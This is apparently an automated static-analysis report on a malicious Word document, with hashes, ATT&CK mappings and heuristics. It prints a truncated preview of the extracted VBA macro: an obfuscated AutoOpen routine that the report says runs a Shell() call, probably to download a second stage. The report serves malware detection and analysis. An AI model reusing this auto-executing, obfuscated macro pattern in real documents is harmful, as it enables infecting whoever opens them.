Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d772837ae2873b5e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 117.0 KB
Created: 2018-09-27 22:54:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: d226a2913d57813b19a03932699c973e
SHA-1: 40fbd3cb74894924400f8dacdd71574158da306e
SHA-256: d772837ae2873b5eb3809366707fc349283dad768f05eaec332ed2dbe7097fe5
Risk Score: 202

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample is a malicious Office document containing a VBA macro. An AutoOpen macro is present and uses a Shell() call, indicating it is designed to execute arbitrary code when the document is opened. The macro is heavily obfuscated, but the combination of auto-execution and the Shell() call strongly suggests a downloader for a second-stage payload. No specific family could be identified because of the obfuscation.

Heuristics (6)

  • ClamAV: Doc.Malware.00536d-6922936-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6922936-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19384 bytes
SHA-256: df3a2bf0aa44a4095889fd4af6c4a16a3fa22f616164e38097843d2b3659dc78

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "naApzDZwWb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim CUqMH(2)
CUqMH(0) = InStr(DNMsj + wYFWYpYnliBOJrqID + jALCHjB, PMZVf + IRSdjFiNnoDUrhVrEL + JWlhS) + Left(BjuLhqk + bWEoTswiqUsAomKJHvX + imFJIU, 651) + Left(aPiGimR + icTmBjqujbtwDFhmoZhIO + YcOEXs, 676) + Right(jzwkKZRZ + nbLXTdFjdwTFbccqIjJ + cpJzc, 297)
CUqMH(1) = InStrRev(GiXzN + bSOzQwPrIoRpjtWAvdUIB + pMWEiI, PpUKpOM + onzSYNmtMKRHKMfCUQij + TDbTj) + InStr(jfTOWCQ + KCvsPIfiuHJcGiKEJ + vZbkbqz, qDkFbkWs + TolfYDIHnsMkHVRfj + VCRFr)
   Dim WMRsls(2)
WMRsls(0) = InStrRev(uCjVh + AdOLVTFNijITSMnZla + DjwwbO, HUzCn + zPHHDOCSZjkUhIYKLiWVnr + coThab) + InStrRev(JiTXFBzj + iddwQEddBauTQouwsGIoswZ + EKhqw, lqdYP + wiOOKCiLCijoWolcbYVUkwa + EwXin)
WMRsls(1) = InStrRev(KdjPZ + jfHPEqzFhncYbKizfHiizs + iHQbC, lociVMF + pvKkkATiZnmEAIjTzNGk + pVBiOmZI) + Right(EhuZdIzw + thoULvmBFiKpszkQmOdt + pfGpo, 302) + Left(AzHhh + HnHFGuBizLMjqGdQVQYzMq + psnzP, 272) + InStrRev(aWnEJzd + dDdRujTEACipvPCIqBvwiK + AYHXmwHi, luJTtzNu + bXWRvUliFvHPqSfQliMcnG + XIvloMtS)
   Dim qcRKS(1)
qcRKS(0) = Left(ziiTAOr + LDOuiLnOjmTHupcSAzb + vnbdf, 430) + InStrRev(BKBqD + ipvwlOsjIvLliknCzuj + smhSwtfV, nKDfd + vsUkKIffQDAjZGDzjuvq + FclYbFJ)
   Dim ZOuHuX(1)
ZOuHuX(0) = Right(QzUffjF + ZWAliBHGLHLniRSasoKkQJ + VZqCvrqI, 866) + Right(vMmRo + YdOCNOfOuPlkcZQPJMUwa + PoOFW, 416) + Right(kbcTM + PcwtHYWBBBZEjodC + RIXtM, 673) + InStrRev(iSEmFwrA + oqRMEVWwfvopKdUYAvojZT + mzGNfHMO, EDBwplMB + uIMzWbjzJstWZrSPjcv + uRWDFDUX)
   Dim zaFBa(1)
zaFBa(0) = Left(UKbMwqp + ltHurakkzOSRaMUbTTz + QpESTC, 664) + InStr(wdPVDjW + RbCLCkwzVNnQmZkWRuhQ + VwNtInFc, sUEnUTV + jnjrpkfzZwjKinkDbhIK + jPZOB) + Left(PDmEpE + hIFDjimkGjjSqdsnJVB + bXTGvPrj, 245) + InStr(YCHGFzdo + OGZXOaROnjsHcJqUOzWXw + WliLrM, MQuihpv + HMjvfzaVTtWsjcQsiCwUj + tjtIfT)
   Dim CdkJr(2)
CdkJr(0) = InStrRev(qOzAKjc + ttlMAwMDEFcPwTSWjoi + FlhYz, tQpJamN + qXGmwaRIfrOGFSZHPQ + TTLMan) + InStr(GOSpQco + KQQUsnKNwHMncKmSmmA + wkAoPLji, Ezzsb + BNpGWAiNFpWamVXHW + BPdzFknf)
CdkJr(1) = Left(UOlmo + jaKCFtHjtMcVTbMacWv + hniBLiYw, 648) + Left(vosvVW + rbCwrtiZOLDomTOFazVO + vfkNQE, 112) + InStrRev(zPirmI + wkWsjUXdHRWMIXwNE + KFuSo, bcwDtWdY + WQqnzVtbCWTpupaQzQUQ + iUjiz) + InStrRev(qlqoaVM + YMBTHmkGjDHCzImSUlL + ldEEiM, zYsHOO + SzcTfcIqoRiuwnNkiizFtLq + Culur)
   Dim LiFOi(1)
LiFOi(0) = Right(chHJJtf + NUoQLGCQQcuINkZVqfGr + YbzAJD, 307) + InStrRev(QpDXME + ESEjTUYjTJDNHcnfEQANMo + tWNMRJqC, rEHYQ + GCHJMYjZcYDEsWfNLGru + DaziX) + Right(PiFmfnjz + rhRwUMzZsDZcPHlwjpCv + anFzjwPi, 356) + Left(FGjOzJ + vpBqiuiYzwplsKtYAuovKP + wYkjjPI, 561)
   Dim mjIoJ(2)
mjIoJ(0) = Right(PqvlSC + XjjQJUtHoTwouDUuAdctYJ + PwZXGYX, 440) + Left(bQhtBA + WYVnYuwHBvmHGomiRNaRXw + DMHcbu, 673)
mjIoJ(1) = Left(McafZwnV + GUcvPSibvGwouviZTsY + ZBIDrPnv, 917) + Left(vbRrJ + HrqOnAfDJwhAlVOJP + IKCJP, 680) + InStrRev(mPLjRcA + wCMMizFTupvcAtifMiuQLZ + wtQYlKA, dziLO + odiJOSLVUwjElAnHLDWEkcpj + DUwazciq) + Left(ihuiQM + acMXtsrSZzhUaqAAJE + wuzNiJ, 847)
jJFKbTtoJbGsCo (KeyString(roEhdBBR + UWjsiwb + 21 + 13 + 33 + mzBrKF + sELuvSZD) + WViti + Fjttu + KeyString(infzpzu + HJNQhZEJ + 24 + 15 + 38 + vEIntVnp + mAwZhP) + MvbLMkzfUw + AmQoEVErEi + klYsUjVw + jaaroH + tPGUj)
   Dim okkjv(2)
okkjv(0) = InStr(wSPDqcin + UTspSNWbsaUWubUujwc + iIbkQOZF, ANZbWX + iSSbvrZAKsqNBLKllKw + iGuzrz) + Right(UnunYC + tqNONUJAYQLlcwzzoari + VWHwZ, 554) + Left(frTkFHfm + TjmlrpKpFXjBIMBNMavHNG + ztpRCos, 294) + InStrRev(jiRmkBD + qLXDQCYZXbYfGLloUrJtvb + wapuEmHu, qZOdPTr + EXGbpOFHjRcEczjd + YLrjFMZ)
okkjv(1) = InStr(qBEaDaq + iphzOwORKBNTPjLOr + pOfqQ, FdmAj + FYzqlqupLGnlKbHPaAS + laMMhP) + InStrRev(OmKHOXFt + ZUjcmriKsTYjmFKdiha + ZwAPA, WSZsz + nVdTEjpFXCpPaszYcCn + NGqzGG) + InStrRev(kwXIE + YajtcMlHGrjMGziKFw + jwdwEWX, idABSu + CVjqOAfXqXduqsAuzQ + jzVCQa) + Right(FQDDdzsV + RjfAdbWJJSAOFzqsXkEM + MqFutz, 594)
... (truncated)